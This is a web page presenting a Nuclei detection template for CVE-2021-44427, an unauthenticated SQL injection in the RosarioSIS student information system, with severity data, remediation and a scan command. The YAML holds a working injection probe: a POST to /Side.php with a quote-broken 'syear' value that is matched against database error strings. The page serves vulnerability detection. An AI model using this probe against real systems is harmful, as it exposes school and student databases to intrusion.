Rosario Student Information System Unauthenticated SQL Injection
ID: CVE-2021-44427
Severity: critical
Author: furkansayim,xShuden
Tags: cve,cve2021,sqli,rosariosis
Description
Section titled “Description”An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
YAML Source
Section titled “YAML Source”id: CVE-2021-44427
info: name: Rosario Student Information System Unauthenticated SQL Injection author: furkansayim,xShuden severity: critical description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database, modify data, or execute arbitrary SQL commands. remediation: Upgrade to version 8.1.1 or higher. reference: - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328 - https://twitter.com/RemotelyAlerts/status/1465697928178122775 - https://nvd.nist.gov/vuln/detail/CVE-2021-44427 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-44427 cwe-id: CWE-89 epss-score: 0.04431 epss-percentile: 0.92396 cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rosariosis product: rosariosis tags: cve,cve2021,sqli,rosariosis
http: - method: POST path: - "{{BaseURL}}/Side.php"
body: "sidefunc=update&syear=111'"
headers: Content-Type: application/x-www-form-urlencoded; charset=utf-8
matchers-condition: and matchers: - type: word part: body words: - "DB Execute Failed. ERROR:" - "unterminated quoted string" condition: and
- type: word part: header words: - "RosarioSIS="
- type: status status: - 200# digest: 4a0a0047304502206b62ed872d64efd32ce3f9ad85cee94aa50281579bc185ddfea20d2aeb355a12022100eff60d51153722f5d662cc1a6ecbe712dcb60d1c0f969be969056a7935e28394:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-44427.yaml"